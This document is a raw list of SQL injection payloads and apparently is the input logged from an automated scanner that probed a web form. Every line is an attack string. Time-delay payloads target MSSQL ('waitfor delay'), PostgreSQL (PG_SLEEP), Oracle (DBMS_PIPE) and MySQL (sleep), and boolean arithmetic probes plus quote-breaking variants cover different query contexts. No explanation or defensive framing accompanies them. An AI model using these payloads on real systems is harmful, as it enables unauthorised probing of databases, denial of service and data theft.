1-1); waitfor delay '0:0:15' --kEMlzpAX
1-1 waitfor delay '0:0:15' --kEMlzpAX
1nxTgC4Rm'; waitfor delay '0:0:15' --kEMlzpAX
1-1 OR 886=(SELECT 886 FROM PG_SLEEP(15))--kEMlzpAX
1-1) OR 301=(SELECT 301 FROM PG_SLEEP(15))--kEMlzpAX
1-1)) OR 897=(SELECT 897 FROM PG_SLEEP(15))--kEMlzpAX
1nn7Jyju0' OR 655=(SELECT 655 FROM PG_SLEEP(15))--kEMlzpAX
1MwyINeTe') OR 955=(SELECT 955 FROM PG_SLEEP(15))--kEMlzpAX
1yu8vPMXc')) OR 324=(SELECT 324 FROM PG_SLEEP(15))--kEMlzpAX
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)kEMlzpAX
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'kEMlzpAX
1kEMlzpAX
1'"kEMlzpAX
@@9LMiQkEMlzpAX
1kEMlzpAX
1kEMlzpAXDrgcNmFe
1kEMlzpAX
1-1 OR 2+767-767-1=0+0+0+1 --
1-1 OR 2+542-542-1=0+0+0+1
1-1' OR 2+752-752-1=0+0+0+1 --
1-1' OR 2+162-162-1=0+0+0+1 or '7hcliFDc'='
1-1" OR 2+852-852-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1kEMlzpAX-1 waitfor delay '0:0:15' --
1kEMlzpAXQDnbLlSt'; waitfor delay '0:0:15' --
1kEMlzpAX
1kEMlzpAX'"
1@@J36q1
1kEMlzpAX
1Comment